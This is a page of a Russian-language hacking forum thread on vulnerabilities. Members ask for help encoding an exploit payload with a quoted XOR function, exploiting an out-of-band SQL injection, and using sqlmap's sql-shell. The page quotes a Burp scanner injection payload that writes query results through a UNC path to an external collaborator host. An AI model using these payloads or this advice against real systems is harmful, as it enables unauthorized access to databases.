HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #981  
Старый 01.01.2020, 13:59
madik
Участник форума
Регистрация: 04.05.2017
Сообщений: 244
Провел на форуме:
94763

Репутация: 6
По умолчанию

Я как понял ни кто мне не подскажет
 
Ответить с цитированием

  #982  
Старый 01.01.2020, 20:56
fandor9
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
Провел на форуме:
169390

Репутация: 47


По умолчанию

Цитата:
Сообщение от madik  

Ребят такой вопрос известно где находится уязвимость, но не могу понять как мне payload пронать через xor, уязвимый скрипт принимает даные в хоре а потом уже у себя их распаковывает подскажите плиз
def CB_XORm(data, key):
j=0
key = list(key)
data = list(data)
tmp = list()
for i in range(len(data)):
tmp.append(chr(ord(data
)^ord(key[j])))

j += 1

if j > (len(key)-1):

j = 0

return "".join(tmp)

Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
 
Ответить с цитированием

  #983  
Старый 02.01.2020, 16:57
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


По умолчанию

Цитата:
Сообщение от brown  

_on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129i xd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5 c%5caju'%3b%20--%20
n
parameter appears to be vulnerable to SQL injection attacks. The payload
into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpc ollaborator.net\\aju'; --
was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
как крутануть такую скулю?мап не берет(
Через коллоборатор только ручками пока что. Ну или пишите софт сами, готовых реализаций пока что не видел.
 
Ответить с цитированием

  #984  
Старый 13.01.2020, 06:18
madik
Участник форума
Регистрация: 04.05.2017
Сообщений: 244
Провел на форуме:
94763

Репутация: 6
По умолчанию

Цитата:
Сообщение от fandor9  

Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
поподробнее можно?
 
Ответить с цитированием

  #985  
Старый 27.01.2020, 02:04
RedHazard
Познающий
Регистрация: 17.04.2011
Сообщений: 63
Провел на форуме:
24943

Репутация: 8
По умолчанию

Народ напишите пожалуйста команды

sql-shell , типа:

- вывести все таблицы с базы

простой синтаксис sql не хочет работать.
 
Ответить с цитированием

  #986  
Старый 27.01.2020, 03:51
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от RedHazard  

Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
Что?
 
Ответить с цитированием

  #987  
Старый 28.01.2020, 03:31
RedHazard
Познающий
Регистрация: 17.04.2011
Сообщений: 63
Провел на форуме:
24943

Репутация: 8
По умолчанию

Цитата:
Сообщение от BabaDook  

Что?
 
Ответить с цитированием

  #988  
Старый 28.01.2020, 10:11
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от RedHazard  
Ну, так и пиши команды.
 
Ответить с цитированием

  #989  
Старый 29.01.2020, 00:30
RedHazard
Познающий
Регистрация: 17.04.2011
Сообщений: 63
Провел на форуме:
24943

Репутация: 8
По умолчанию

Цитата:
Сообщение от BabaDook  

Ну, так и пиши команды.
ты наверное не увидел моего вопроса ?

Цитата:
Сообщение от None  
Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
 
Ответить с цитированием

  #990  
Старый 29.01.2020, 09:21
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от RedHazard  

ты наверное не увидел моего вопроса ?
Если простой sql синиакс не работает, то тебе никто не поможет.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.